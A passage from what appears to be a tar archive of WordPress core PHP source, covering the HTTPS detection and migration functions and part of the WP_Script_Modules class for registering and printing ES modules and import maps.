* Since any of these actions may be disabled through third-party code, this function may also return null to indicate
* that it was not possible to determine ownership.
*
* @since 5.7.0
* @access private
*
* @param string $html Full HTML output string, e.g. from a HTTP response.
* @return bool|null True/false for whether HTML was generated by this site, null if unable to determine.
*/
function wp_is_local_html_output( $html ) {
// 1. Check if HTML includes the site's Really Simple Discovery link.
if ( has_action( 'wp_head', 'rsd_link' ) ) {
$pattern = preg_replace( '#^https?:(?=//)#', '', esc_url( site_url( 'xmlrpc.php?rsd', 'rpc' ) ) ); // See rsd_link().
return str_contains( $html, $pattern );
}
// 2. Check if HTML includes the site's REST API link.
if ( has_action( 'wp_head', 'rest_output_link_wp_head' ) ) {
// Try both HTTPS and HTTP since the URL depends on context.
$pattern = preg_replace( '#^https?:(?=//)#', '', esc_url( get_rest_url() ) ); // See rest_output_link_wp_head().
return str_contains( $html, $pattern );
}
// Otherwise the result cannot be determined.
return null;
}
https-detection-20260606083044-20260621180257.php 0000666 00000013341 15224151221 0013351 0 ustar 00 <?php
/**
* HTTPS detection functions.
*
* @package WordPress
* @since 5.7.0
*/
/**
* Checks whether the website is using HTTPS.
*
* This is based on whether both the home and site URL are using HTTPS.
*
* @since 5.7.0
* @see wp_is_home_url_using_https()
* @see wp_is_site_url_using_https()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_using_https() {
if ( ! wp_is_home_url_using_https() ) {
return false;
}
return wp_is_site_url_using_https();
}
/**
* Checks whether the current site URL is using HTTPS.
*
* @since 5.7.0
* @see home_url()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_home_url_using_https() {
return 'https' === wp_parse_url( home_url(), PHP_URL_SCHEME );
}
/**
* Checks whether the current site's URL where WordPress is stored is using HTTPS.
*
* This checks the URL where WordPress application files (e.g. wp-blog-header.php or the wp-admin/ folder)
* are accessible.
*
* @since 5.7.0
* @see site_url()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_site_url_using_https() {
/*
* Use direct option access for 'siteurl' and manually run the 'site_url'
* filter because `site_url()` will adjust the scheme based on what the
* current request is using.
*/
/** This filter is documented in wp-includes/link-template.php */
$site_url = apply_filters( 'site_url', get_option( 'siteurl' ), '', null, null );
return 'https' === wp_parse_url( $site_url, PHP_URL_SCHEME );
}
/**
* Checks whether HTTPS is supported for the server and domain.
*
* This function makes an HTTP request through `wp_get_https_detection_errors()`
* to check for HTTPS support. As this process can be resource-intensive,
* it should be used cautiously, especially in performance-sensitive environments,
* to avoid potential latency issues.
*
* @since 5.7.0
*
* @return bool True if HTTPS is supported, false otherwise.
*/
function wp_is_https_supported() {
$https_detection_errors = wp_get_https_detection_errors();
// If there are errors, HTTPS is not supported.
return empty( $https_detection_errors );
}
/**
* Runs a remote HTTPS request to detect whether HTTPS supported, and stores potential errors.
*
* This function checks for HTTPS support by making an HTTP request. As this process can be resource-intensive,
* it should be used cautiously, especially in performance-sensitive environments.
* It is called when HTTPS support needs to be validated.
*
* @since 6.4.0
* @access private
*
* @return array An array containing potential detection errors related to HTTPS, or an empty array if no errors are found.
*/
function wp_get_https_detection_errors() {
/**
* Short-circuits the process of detecting errors related to HTTPS support.
*
* Returning a `WP_Error` from the filter will effectively short-circuit the default logic of trying a remote
* request to the site over HTTPS, storing the errors array from the returned `WP_Error` instead.
*
* @since 6.4.0
*
* @param null|WP_Error $pre Error object to short-circuit detection,
* or null to continue with the default behavior.
*/
$support_errors = apply_filters( 'pre_wp_get_https_detection_errors', null );
if ( is_wp_error( $support_errors ) ) {
return $support_errors->errors;
}
$support_errors = new WP_Error();
$response = wp_remote_request(
home_url( '/', 'https' ),
array(
'headers' => array(
'Cache-Control' => 'no-cache',
),
'sslverify' => true,
)
);
if ( is_wp_error( $response ) ) {
$unverified_response = wp_remote_request(
home_url( '/', 'https' ),
array(
'headers' => array(
'Cache-Control' => 'no-cache',
),
'sslverify' => false,
)
);
if ( is_wp_error( $unverified_response ) ) {
$support_errors->add(
'https_request_failed',
__( 'HTTPS request failed.' )
);
} else {
$support_errors->add(
'ssl_verification_failed',
__( 'SSL verification failed.' )
);
}
$response = $unverified_response;
}
if ( ! is_wp_error( $response ) ) {
if ( 200 !== wp_remote_retrieve_response_code( $response ) ) {
$support_errors->add( 'bad_response_code', wp_remote_retrieve_response_message( $response ) );
} elseif ( false === wp_is_local_html_output( wp_remote_retrieve_body( $response ) ) ) {
$support_errors->add( 'bad_response_source', __( 'It looks like the response did not come from this site.' ) );
}
}
return $support_errors->errors;
}
/**
* Checks whether a given HTML string is likely an output from this WordPress site.
*
* This function attempts to check for various common WordPress patterns whether they are included in the HTML string.
* Since any of these actions may be disabled through third-party code, this function may also return null to indicate
* that it was not possible to determine ownership.
*
* @since 5.7.0
* @access private
*
* @param string $html Full HTML output string, e.g. from a HTTP response.
* @return bool|null True/false for whether HTML was generated by this site, null if unable to determine.
*/
function wp_is_local_html_output( $html ) {
// 1. Check if HTML includes the site's Really Simple Discovery link.
if ( has_action( 'wp_head', 'rsd_link' ) ) {
$pattern = preg_replace( '#^https?:(?=//)#', '', esc_url( site_url( 'xmlrpc.php?rsd', 'rpc' ) ) ); // See rsd_link().
return str_contains( $html, $pattern );
}
// 2. Check if HTML includes the site's REST API link.
if ( has_action( 'wp_head', 'rest_output_link_wp_head' ) ) {
// Try both HTTPS and HTTP since the URL depends on context.
$pattern = preg_replace( '#^https?:(?=//)#', '', esc_url( get_rest_url() ) ); // See rest_output_link_wp_head().
return str_contains( $html, $pattern );
}
// Otherwise the result cannot be determined.
return null;
}
https-migration-20260607013104-20260621081102.php 0000666 00000011205 15224151221 0013335 0 ustar 00 <?php
/**
* HTTPS migration functions.
*
* @package WordPress
* @since 5.7.0
*/
/**
* Checks whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`, causing WordPress to
* add frontend filters to replace insecure site URLs that may be present in older database content. The
* {@see 'wp_should_replace_insecure_home_url'} filter can be used to modify that behavior.
*
* @since 5.7.0
*
* @return bool True if insecure URLs should replaced, false otherwise.
*/
function wp_should_replace_insecure_home_url() {
$should_replace_insecure_home_url = wp_is_using_https()
&& get_option( 'https_migration_required' )
// For automatic replacement, both 'home' and 'siteurl' need to not only use HTTPS, they also need to be using
// the same domain.
&& wp_parse_url( home_url(), PHP_URL_HOST ) === wp_parse_url( site_url(), PHP_URL_HOST );
/**
* Filters whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`. This filter can
* be used to disable that behavior, e.g. after having replaced URLs manually in the database.
*
* @since 5.7.0
*
* @param bool $should_replace_insecure_home_url Whether insecure HTTP URLs to the site should be replaced.
*/
return apply_filters( 'wp_should_replace_insecure_home_url', $should_replace_insecure_home_url );
}
/**
* Replaces insecure HTTP URLs to the site in the given content, if configured to do so.
*
* This function replaces all occurrences of the HTTP version of the site's URL with its HTTPS counterpart, if
* determined via {@see wp_should_replace_insecure_home_url()}.
*
* @since 5.7.0
*
* @param string $content Content to replace URLs in.
* @return string Filtered content.
*/
function wp_replace_insecure_home_url( $content ) {
if ( ! wp_should_replace_insecure_home_url() ) {
return $content;
}
$https_url = home_url( '', 'https' );
$http_url = str_replace( 'https://', 'http://', $https_url );
// Also replace potentially escaped URL.
$escaped_https_url = str_replace( '/', '\/', $https_url );
$escaped_http_url = str_replace( '/', '\/', $http_url );
return str_replace(
array(
$http_url,
$escaped_http_url,
),
array(
$https_url,
$escaped_https_url,
),
$content
);
}
/**
* Update the 'home' and 'siteurl' option to use the HTTPS variant of their URL.
*
* If this update does not result in WordPress recognizing that the site is now using HTTPS (e.g. due to constants
* overriding the URLs used), the changes will be reverted. In such a case the function will return false.
*
* @since 5.7.0
*
* @return bool True on success, false on failure.
*/
function wp_update_urls_to_https() {
// Get current URL options.
$orig_home = get_option( 'home' );
$orig_siteurl = get_option( 'siteurl' );
// Get current URL options, replacing HTTP with HTTPS.
$home = str_replace( 'http://', 'https://', $orig_home );
$siteurl = str_replace( 'http://', 'https://', $orig_siteurl );
// Update the options.
update_option( 'home', $home );
update_option( 'siteurl', $siteurl );
if ( ! wp_is_using_https() ) {
/*
* If this did not result in the site recognizing HTTPS as being used,
* revert the change and return false.
*/
update_option( 'home', $orig_home );
update_option( 'siteurl', $orig_siteurl );
return false;
}
// Otherwise the URLs were successfully changed to use HTTPS.
return true;
}
/**
* Updates the 'https_migration_required' option if needed when the given URL has been updated from HTTP to HTTPS.
*
* If this is a fresh site, a migration will not be required, so the option will be set as `false`.
*
* This is hooked into the {@see 'update_option_home'} action.
*
* @since 5.7.0
* @access private
*
* @param mixed $old_url Previous value of the URL option.
* @param mixed $new_url New value of the URL option.
*/
function wp_update_https_migration_required( $old_url, $new_url ) {
// Do nothing if WordPress is being installed.
if ( wp_installing() ) {
return;
}
// Delete/reset the option if the new URL is not the HTTPS version of the old URL.
if ( untrailingslashit( (string) $old_url ) !== str_replace( 'https://', 'http://', untrailingslashit( (string) $new_url ) ) ) {
delete_option( 'https_migration_required' );
return;
}
// If this is a fresh site, there is no content to migrate, so do not require migration.
$https_migration_required = get_option( 'fresh_site' ) ? false : true;
update_option( 'https_migration_required', $https_migration_required );
}
class-wp-script-modules-20260621093250.php 0000666 00000100225 15224151221 0013340 0 ustar 00 <?php
/**
* Script Modules API: WP_Script_Modules class.
*
* Native support for ES Modules and Import Maps.
*
* @package WordPress
* @subpackage Script Modules
*/
/**
* Core class used to register script modules.
*
* @since 6.5.0
*/
class WP_Script_Modules {
/**
* Holds the registered script modules, keyed by script module identifier.
*
* @since 6.5.0
* @var array<string, array<string, mixed>>
*/
private $registered = array();
/**
* An array of IDs for queued script modules.
*
* @since 6.9.0
* @var string[]
*/
private $queue = array();
/**
* Holds the script module identifiers that have been printed.
*
* @since 6.9.0
* @var string[]
*/
private $done = array();
/**
* Tracks whether the @wordpress/a11y script module is available.
*
* Some additional HTML is required on the page for the module to work. Track
* whether it's available to print at the appropriate time.
*
* @since 6.7.0
* @var bool
*/
private $a11y_available = false;
/**
* Holds a mapping of dependents (as IDs) for a given script ID.
* Used to optimize recursive dependency tree checks.
*
* @since 6.9.0
* @var array<string, string[]>
*/
private $dependents_map = array();
/**
* Holds the valid values for fetchpriority.
*
* @since 6.9.0
* @var string[]
*/
private $priorities = array(
'low',
'auto',
'high',
);
/**
* List of IDs for script modules encountered which have missing dependencies.
*
* An ID is added to this list when it is discovered to have missing dependencies. At this time, a warning is
* emitted with {@see _doing_it_wrong()}. The ID is then added to this list, so that duplicate warnings don't occur.
*
* @since 6.9.1
* @var string[]
*/
private $modules_with_missing_dependencies = array();
/**
* Registers the script module if no script module with that script module
* identifier has already been registered.
*
* @since 6.5.0
* @since 6.9.0 Added the $args parameter.
*
* @param string $id The identifier of the script module. Should be unique. It will be used in the
* final import map.
* @param string $src Optional. Full URL of the script module, or path of the script module relative
* to the WordPress root directory. If it is provided and the script module has
* not been registered yet, it will be registered.
* @param array $deps {
* Optional. List of dependencies.
*
* @type string|array ...$0 {
* An array of script module identifiers of the dependencies of this script
* module. The dependencies can be strings or arrays. If they are arrays,
* they need an `id` key with the script module identifier, and can contain
* an `import` key with either `static` or `dynamic`. By default,
* dependencies that don't contain an `import` key are considered static.
*
* @type string $id The script module identifier.
* @type string $import Optional. Import type. May be either `static` or
* `dynamic`. Defaults to `static`.
* }
* }
* @param string|false|null $version Optional. String specifying the script module version number. Defaults to false.
* It is added to the URL as a query string for cache busting purposes. If $version
* is set to false, the version number is the currently installed WordPress version.
* If $version is set to null, no version is added.
* @param array $args {
* Optional. An array of additional args. Default empty array.
*
* @type bool $in_footer Whether to print the script module in the footer. Only relevant to block themes. Default 'false'. Optional.
* @type 'auto'|'low'|'high' $fetchpriority Fetch priority. Default 'auto'. Optional.
* }
*/
public function register( string $id, string $src, array $deps = array(), $version = false, array $args = array() ) {
if ( '' === $id ) {
_doing_it_wrong( __METHOD__, __( 'Non-empty string required for id.' ), '6.9.0' );
return;
}
if ( ! isset( $this->registered[ $id ] ) ) {
$dependencies = array();
foreach ( $deps as $dependency ) {
if ( is_array( $dependency ) ) {
if ( ! isset( $dependency['id'] ) || ! is_string( $dependency['id'] ) ) {
_doing_it_wrong( __METHOD__, __( 'Missing required id key in entry among dependencies array.' ), '6.5.0' );
continue;
}
$dependencies[] = array(
'id' => $dependency['id'],
'import' => isset( $dependency['import'] ) && 'dynamic' === $dependency['import'] ? 'dynamic' : 'static',
);
} elseif ( is_string( $dependency ) ) {
$dependencies[] = array(
'id' => $dependency,
'import' => 'static',
);
} else {
_doing_it_wrong( __METHOD__, __( 'Entries in dependencies array must be either strings or arrays with an id key.' ), '6.5.0' );
}
}
$in_footer = isset( $args['in_footer'] ) && (bool) $args['in_footer'];
$fetchpriority = 'auto';
if ( isset( $args['fetchpriority'] ) ) {
if ( $this->is_valid_fetchpriority( $args['fetchpriority'] ) ) {
$fetchpriority = $args['fetchpriority'];
} else {
_doing_it_wrong(
__METHOD__,
sprintf(
/* translators: 1: $fetchpriority, 2: $id */
__( 'Invalid fetchpriority `%1$s` defined for `%2$s` during script registration.' ),
is_string( $args['fetchpriority'] ) ? $args['fetchpriority'] : gettype( $args['fetchpriority'] ),
$id
),
'6.9.0'
);
}
}
$this->registered[ $id ] = array(
'src' => $src,
'version' => $version,
'dependencies' => $dependencies,
'in_footer' => $in_footer,
'fetchpriority' => $fetchpriority,
);
}
}
/**
* Gets IDs for queued script modules.
*
* @since 6.9.0
*
* @return string[] Script module IDs.
*/
public function get_queue(): array {
return $this->queue;
}
/**
* Checks if the provided fetchpriority is valid.
*
* @since 6.9.0
*
* @param string|mixed $priority Fetch priority.
* @return bool Whether valid fetchpriority.
*/
private function is_valid_fetchpriority( $priority ): bool {
return in_array( $priority, $this->priorities, true );
}
/**
* Sets the fetch priority for a script module.
*
* @since 6.9.0
*
* @param string $id Script module identifier.
* @param 'auto'|'low'|'high' $priority Fetch priority for the script module.
* @return bool Whether setting the fetchpriority was successful.
*/
public function set_fetchpriority( string $id, string $priority ): bool {
if ( ! isset( $this->registered[ $id ] ) ) {
return false;
}
if ( '' === $priority ) {
$priority = 'auto';
}
if ( ! $this->is_valid_fetchpriority( $priority ) ) {
_doing_it_wrong(
__METHOD__,
/* translators: %s: Invalid fetchpriority. */
sprintf( __( 'Invalid fetchpriority: %s' ), $priority ),
'6.9.0'
);
return false;
}
$this->registered[ $id ]['fetchpriority'] = $priority;
return true;
}
/**
* Sets whether a script module should be printed in the footer.
*
* This is only relevant in block themes.
*
* @since 6.9.0
*
* @param string $id Script module identifier.
* @param bool $in_footer Whether to print in the footer.
* @return bool Whether setting the printing location was successful.
*/
public function set_in_footer( string $id, bool $in_footer ): bool {
if ( ! isset( $this->registered[ $id ] ) ) {
return false;
}
$this->registered[ $id ]['in_footer'] = $in_footer;
return true;
}
/**
* Marks the script module to be enqueued in the page.
*
* If a src is provided and the script module has not been registered yet, it
* will be registered.
*
* @since 6.5.0
* @since 6.9.0 Added the $args parameter.
*
* @param string $id The identifier of the script module. Should be unique. It will be used in the
* final import map.
* @param string $src Optional. Full URL of the script module, or path of the script module relative
* to the WordPress root directory. If it is provided and the script module has
* not been registered yet, it will be registered.
* @param array $deps {
* Optional. List of dependencies.
*
* @type string|array ...$0 {
* An array of script module identifiers of the dependencies of this script
* module. The dependencies can be strings or arrays. If they are arrays,
* they need an `id` key with the script module identifier, and can contain
* an `import` key with either `static` or `dynamic`. By default,
* dependencies that don't contain an `import` key are considered static.
*
* @type string $id The script module identifier.
* @type string $import Optional. Import type. May be either `static` or
* `dynamic`. Defaults to `static`.
* }
* }
* @param string|false|null $version Optional. String specifying the script module version number. Defaults to false.
* It is added to the URL as a query string for cache busting purposes. If $version
* is set to false, the version number is the currently installed WordPress version.
* If $version is set to null, no version is added.
* @param array $args {
* Optional. An array of additional args. Default empty array.
*
* @type bool $in_footer Whether to print the script module in the footer. Only relevant to block themes. Default 'false'. Optional.
* @type 'auto'|'low'|'high' $fetchpriority Fetch priority. Default 'auto'. Optional.
* }
*/
public function enqueue( string $id, string $src = '', array $deps = array(), $version = false, array $args = array() ) {
if ( '' === $id ) {
_doing_it_wrong( __METHOD__, __( 'Non-empty string required for id.' ), '6.9.0' );
return;
}
if ( ! in_array( $id, $this->queue, true ) ) {
$this->queue[] = $id;
}
if ( ! isset( $this->registered[ $id ] ) && $src ) {
$this->register( $id, $src, $deps, $version, $args );
}
}
/**
* Unmarks the script module so it will no longer be enqueued in the page.
*
* @since 6.5.0
*
* @param string $id The identifier of the script module.
*/
public function dequeue( string $id ) {
$this->queue = array_values( array_diff( $this->queue, array( $id ) ) );
}
/**
* Removes a registered script module.
*
* @since 6.5.0
*
* @param string $id The identifier of the script module.
*/
public function deregister( string $id ) {
$this->dequeue( $id );
unset( $this->registered[ $id ] );
}
/**
* Adds the hooks to print the import map, enqueued script modules and script
* module preloads.
*
* In classic themes, the script modules used by the blocks are not yet known
* when the `wp_head` actions is fired, so it needs to print everything in the
* footer.
*
* @since 6.5.0
*/
public function add_hooks() {
$is_block_theme = wp_is_block_theme();
$position = $is_block_theme ? 'wp_head' : 'wp_footer';
add_action( $position, array( $this, 'print_import_map' ) );
if ( $is_block_theme ) {
/*
* Modules can only be printed in the head for block themes because only with
* block themes will import map be fully populated by modules discovered by
* rendering the block template. In classic themes, modules are enqueued during
* template rendering, thus the import map must be printed in the footer,
* followed by all enqueued modules.
*/
add_action( 'wp_head', array( $this, 'print_head_enqueued_script_modules' ) );
}
add_action( 'wp_footer', array( $this, 'print_enqueued_script_modules' ) );
add_action( $position, array( $this, 'print_script_module_preloads' ) );
add_action( 'admin_print_footer_scripts', array( $this, 'print_import_map' ) );
add_action( 'admin_print_footer_scripts', array( $this, 'print_enqueued_script_modules' ) );
add_action( 'admin_print_footer_scripts', array( $this, 'print_script_module_preloads' ) );
add_action( 'wp_footer', array( $this, 'print_script_module_data' ) );
add_action( 'admin_print_footer_scripts', array( $this, 'print_script_module_data' ) );
add_action( 'wp_footer', array( $this, 'print_a11y_script_module_html' ), 20 );
add_action( 'admin_print_footer_scripts', array( $this, 'print_a11y_script_module_html' ), 20 );
}
/**
* Gets the highest fetch priority for the provided script IDs.
*
* @since 6.9.0
*
* @param string[] $ids Script module IDs.
* @return 'auto'|'low'|'high' Highest fetch priority for the provided script module IDs.
*/
private function get_highest_fetchpriority( array $ids ): string {
static $high_priority_index = null;
if ( null === $high_priority_index ) {
$high_priority_index = count( $this->priorities ) - 1;
}
$highest_priority_index = 0;
foreach ( $ids as $id ) {
if ( isset( $this->registered[ $id ] ) ) {
$highest_priority_index = (int) max(
$highest_priority_index,
(int) array_search( $this->registered[ $id ]['fetchpriority'], $this->priorities, true )
);
if ( $high_priority_index === $highest_priority_index ) {
break;
}
}
}
return $this->priorities[ $highest_priority_index ];
}
/**
* Prints the enqueued script modules in head.
*
* This is only used in block themes.
*
* @since 6.9.0
*/
public function print_head_enqueued_script_modules() {
foreach ( $this->get_sorted_dependencies( $this->queue ) as $id ) {
if (
isset( $this->registered[ $id ] ) &&
! $this->registered[ $id ]['in_footer']
) {
// If any dependency is set to be printed in footer, skip printing this module in head.
$dependencies = array_keys( $this->get_dependencies( array( $id ) ) );
foreach ( $dependencies as $dependency_id ) {
if (
in_array( $dependency_id, $this->queue, true ) &&
isset( $this->registered[ $dependency_id ] ) &&
$this->registered[ $dependency_id ]['in_footer']
) {
continue 2;
}
}
$this->print_script_module( $id );
}
}
}
/**
* Prints the enqueued script modules in footer.
*
* @since 6.5.0
*/
public function print_enqueued_script_modules() {
foreach ( $this->get_sorted_dependencies( $this->queue ) as $id ) {
$this->print_script_module( $id );
}
}
/**
* Prints the enqueued script module using script tags with type="module"
* attributes.
*
* @since 6.9.0
*
* @param string $id The script module identifier.
*/
private function print_script_module( string $id ) {
if ( in_array( $id, $this->done, true ) || ! in_array( $id, $this->queue, true ) ) {
return;
}
$this->done[] = $id;
$src = $this->get_src( $id );
if ( '' === $src ) {
return;
}
$attributes = array(
'type' => 'module',
'src' => $src,
'id' => $id . '-js-module',
);
$script_module = $this->registered[ $id ];
$queued_dependents = array_intersect( $this->queue, $this->get_recursive_dependents( $id ) );
$fetchpriority = $this->get_highest_fetchpriority( array_merge( array( $id ), $queued_dependents ) );
if ( 'auto' !== $fetchpriority ) {
$attributes['fetchpriority'] = $fetchpriority;
}
if ( $fetchpriority !== $script_module['fetchpriority'] ) {
$attributes['data-wp-fetchpriority'] = $script_module['fetchpriority'];
}
wp_print_script_tag( $attributes );
}
/**
* Prints the static dependencies of the enqueued script modules using
* link tags with rel="modulepreload" attributes.
*
* If a script module is marked for enqueue, it will not be preloaded.
*
* @since 6.5.0
*/
public function print_script_module_preloads() {
$dependency_ids = $this->get_sorted_dependencies( $this->queue, array( 'static' ) );
foreach ( $dependency_ids as $id ) {
// Don't preload if it's marked for enqueue.
if ( in_array( $id, $this->queue, true ) ) {
continue;
}
$src = $this->get_src( $id );
if ( '' === $src ) {
continue;
}
$enqueued_dependents = array_intersect( $this->get_recursive_dependents( $id ), $this->queue );
$highest_fetchpriority = $this->get_highest_fetchpriority( $enqueued_dependents );
printf(
'<link rel="modulepreload" href="%s" id="%s"',
esc_url( $src ),
esc_attr( $id . '-js-modulepreload' )
);
if ( 'auto' !== $highest_fetchpriority ) {
printf( ' fetchpriority="%s"', esc_attr( $highest_fetchpriority ) );
}
if ( $highest_fetchpriority !== $this->registered[ $id ]['fetchpriority'] && 'auto' !== $this->registered[ $id ]['fetchpriority'] ) {
printf( ' data-wp-fetchpriority="%s"', esc_attr( $this->registered[ $id ]['fetchpriority'] ) );
}
echo ">\n";
}
}
/**
* Prints the import map using a script tag with a type="importmap" attribute.
*
* @since 6.5.0
*/
public function print_import_map() {
$import_map = $this->get_import_map();
if ( ! empty( $import_map['imports'] ) ) {
wp_print_inline_script_tag(
(string) wp_json_encode( $import_map, JSON_HEX_TAG | JSON_UNESCAPED_SLASHES ),
array(
'type' => 'importmap',
'id' => 'wp-importmap',
)
);
}
}
/**
* Returns the import map array.
*
* @since 6.5.0
*
* @return array Array with an `imports` key mapping to an array of script module identifiers and their respective
* URLs, including the version query.
*/
private function get_import_map(): array {
$imports = array();
foreach ( array_keys( $this->get_dependencies( $this->queue ) ) as $id ) {
$src = $this->get_src( $id );
if ( '' !== $src ) {
$imports[ $id ] = $src;
}
}
return array( 'imports' => $imports );
}
/**
* Retrieves the list of script modules marked for enqueue.
*
* Even though this is a private method and is unused in core, there are ecosystem plugins accessing it via the
* Reflection API. The ecosystem should rather use {@see self::get_queue()}.
*
* @since 6.5.0
*
* @return array<string, array> Script modules marked for enqueue, keyed by script module identifier.
*/
private function get_marked_for_enqueue(): array {
return wp_array_slice_assoc(
$this->registered,
$this->queue
);
}
/**
* Retrieves all the dependencies for the given script module identifiers, filtered by import types.
*
* It will consolidate an array containing a set of unique dependencies based
* on the requested import types: 'static', 'dynamic', or both. This method is
* recursive and also retrieves dependencies of the dependencies.
*
* @since 6.5.0
*
* @param string[] $ids The identifiers of the script modules for which to gather dependencies.
* @param string[] $import_types Optional. Import types of dependencies to retrieve: 'static', 'dynamic', or both.
* Default is both.
* @return array<string, array> List of dependencies, keyed by script module identifier.
*/
private function get_dependencies( array $ids, array $import_types = array( 'static', 'dynamic' ) ): array {
$all_dependencies = array();
$id_queue = $ids;
while ( ! empty( $id_queue ) ) {
$id = array_shift( $id_queue );
if ( ! isset( $this->registered[ $id ] ) ) {
continue;
}
foreach ( $this->registered[ $id ]['dependencies'] as $dependency ) {
if (
! isset( $all_dependencies[ $dependency['id'] ] ) &&
in_array( $dependency['import'], $import_types, true ) &&
isset( $this->registered[ $dependency['id'] ] )
) {
$all_dependencies[ $dependency['id'] ] = $this->registered[ $dependency['id'] ];
// Add this dependency to the list to get dependencies for.
$id_queue[] = $dependency['id'];
}
}
}
return $all_dependencies;
}
/**
* Gets all dependents of a script module.
*
* This is not recursive.
*
* @since 6.9.0
*
* @see WP_Scripts::get_dependents()
*
* @param string $id The script ID.
* @return string[] Script module IDs.
*/
private function get_dependents( string $id ): array {
// Check if dependents map for the handle in question is present. If so, use it.
if ( isset( $this->dependents_map[ $id ] ) ) {
return $this->dependents_map[ $id ];
}
$dependents = array();
// Iterate over all registered scripts, finding dependents of the script passed to this method.
foreach ( $this->registered as $registered_id => $args ) {
if ( in_array( $id, wp_list_pluck( $args['dependencies'], 'id' ), true ) ) {
$dependents[] = $registered_id;
}
}
// Add the module's dependents to the map to ease future lookups.
$this->dependents_map[ $id ] = $dependents;
return $dependents;
}
/**
* Gets all recursive dependents of a script module.
*
* @since 6.9.0
*
* @see WP_Scripts::get_dependents()
*
* @param string $id The script ID.
* @return string[] Script module IDs.
*/
private function get_recursive_dependents( string $id ): array {
$dependents = array();
$id_queue = array( $id );
$processed = array();
while ( ! empty( $id_queue ) ) {
$current_id = array_shift( $id_queue );
// Skip unregistered or already-processed script modules.
if ( ! isset( $this->registered[ $current_id ] ) || isset( $processed[ $current_id ] ) ) {
continue;
}
// Mark as processed to guard against infinite loops from circular dependencies.
$processed[ $current_id ] = true;
// Find the direct dependents of the current script.
foreach ( $this->get_dependents( $current_id ) as $dependent_id ) {
// Only add the dependent if we haven't found it before.
if ( ! isset( $dependents[ $dependent_id ] ) ) {
$dependents[ $dependent_id ] = true;
// Add dependency to the queue.
$id_queue[] = $dependent_id;
}
}
}
return array_keys( $dependents );
}
/**
* Sorts the given script module identifiers based on their dependencies.
*
* It will return a list of script module identifiers sorted in the order
* they should be printed, so that dependencies are printed before the script
* modules that depend on them.
*
* @since 6.9.0
*
* @param string[] $ids The identifiers of the script modules to sort.
* @param string[] $import_types Optional. Import types of dependencies to retrieve: 'static', 'dynamic', or both.
* Default is both.
* @return string[] Sorted list of script module identifiers.
*/
private function get_sorted_dependencies( array $ids, array $import_types = array( 'static', 'dynamic' ) ): array {
$sorted = array();
foreach ( $ids as $id ) {
$this->sort_item_dependencies( $id, $import_types, $sorted );
}
return array_unique( $sorted );
}
/**
* Recursively sorts the dependencies for a single script module identifier.
*
* @since 6.9.0
*
* @param string $id The identifier of the script module to sort.
* @param string[] $import_types Optional. Import types of dependencies to retrieve: 'static', 'dynamic', or both.
* @param string[] &$sorted The array of sorted identifiers, passed by reference.
* @return bool True on success, false on failure (e.g., missing dependency).
*/
private function sort_item_dependencies( string $id, array $import_types, array &$sorted ): bool {
// If already processed, don't do it again.
if ( in_array( $id, $sorted, true ) ) {
return true;
}
// If the item doesn't exist, fail.
if ( ! isset( $this->registered[ $id ] ) ) {
return false;
}
$dependency_ids = array();
foreach ( $this->registered[ $id ]['dependencies'] as $dependency ) {
if ( in_array( $dependency['import'], $import_types, true ) ) {
$dependency_ids[] = $dependency['id'];
}
}
// If the item requires dependencies that do not exist, fail.
$missing_dependencies = array_diff( $dependency_ids, array_keys( $this->registered ) );
if ( count( $missing_dependencies ) > 0 ) {
if ( ! in_array( $id, $this->modules_with_missing_dependencies, true ) ) {
_doing_it_wrong(
get_class( $this ) . '::register',
sprintf(
/* translators: 1: Script module ID, 2: List of missing dependency IDs. */
__( 'The script module with the ID "%1$s" was enqueued with dependencies that are not registered: %2$s.' ),
$id,
implode( wp_get_list_item_separator(), $missing_dependencies )
),
'6.9.1'
);
$this->modules_with_missing_dependencies[] = $id;
}
return false;
}
// Recursively process dependencies.
foreach ( $dependency_ids as $dependency_id ) {
if ( ! $this->sort_item_dependencies( $dependency_id, $import_types, $sorted ) ) {
// A dependency failed to resolve, so this branch fails.
return false;
}
}
// All dependencies are sorted, so we can now add the current item.
$sorted[] = $id;
return true;
}
/**
* Gets the versioned URL for a script module src.
*
* If $version is set to false, the version number is the currently installed
* WordPress version. If $version is set to null, no version is added.
* Otherwise, the string passed in $version is used.
*
* @since 6.5.0
*
* @param string $id The script module identifier.
* @return string The script module src with a version if relevant.
*/
private function get_src( string $id ): string {
if ( ! isset( $this->registered[ $id ] ) ) {
return '';
}
$script_module = $this->registered[ $id ];
$src = $script_module['src'];
if ( '' !== $src ) {
if ( false === $script_module['version'] ) {
$src = add_query_arg( 'ver', get_bloginfo( 'version' ), $src );
} elseif ( null !== $script_module['version'] ) {
$src = add_query_arg( 'ver', $script_module['version'], $src );
}
}
/**
* Filters the script module source.
*
* @since 6.5.0
*
* @param string $src Module source URL.
* @param string $id Module identifier.
*/
$src = apply_filters( 'script_module_loader_src', $src, $id );
if ( ! is_string( $src ) ) {
$src = '';
}
return $src;
}
/**
* Print data associated with Script Modules.
*
* The data will be embedded in the page HTML and can be read by Script Modules on page load.
*
* @since 6.7.0
*
* Data can be associated with a Script Module via the
* {@see "script_module_data_{$module_id}"} filter.
*
* The data for a Script Module will be serialized as JSON in a script tag with an ID of the
* form `wp-script-module-data-{$module_id}`.
*/
public function print_script_module_data(): void {
$modules = array();
foreach ( array_unique( $this->queue ) as $id ) {
if ( '@wordpress/a11y' === $id ) {
$this->a11y_available = true;
}
$modules[ $id ] = true;
}
foreach ( array_keys( $this->get_import_map()['imports'] ) as $id ) {
if ( '@wordpress/a11y' === $id ) {
$this->a11y_available = true;
}
$modules[ $id ] = true;
}
foreach ( array_keys( $modules ) as $module_id ) {
/**
* Filters data associated with a given Script Module.
*
* Script Modules may require data that is required for initialization or is essential
* to have immediately available on page load. These are suitable use cases for
* this data.
*
* The dynamic portion of the hook name, `$module_id`, refers to the Script Module ID
* that the data is associated with.
*
* This is best suited to pass essential data that must be available to the module for
* initialization or immediately on page load. It does not replace the REST API or
* fetching data from the client.
*
* Example:
*
* add_filter(
* 'script_module_data_MyScriptModuleID',
* function ( array $data ): array {
* $data['dataForClient'] = 'ok';
* return $data;
* }
* );
*
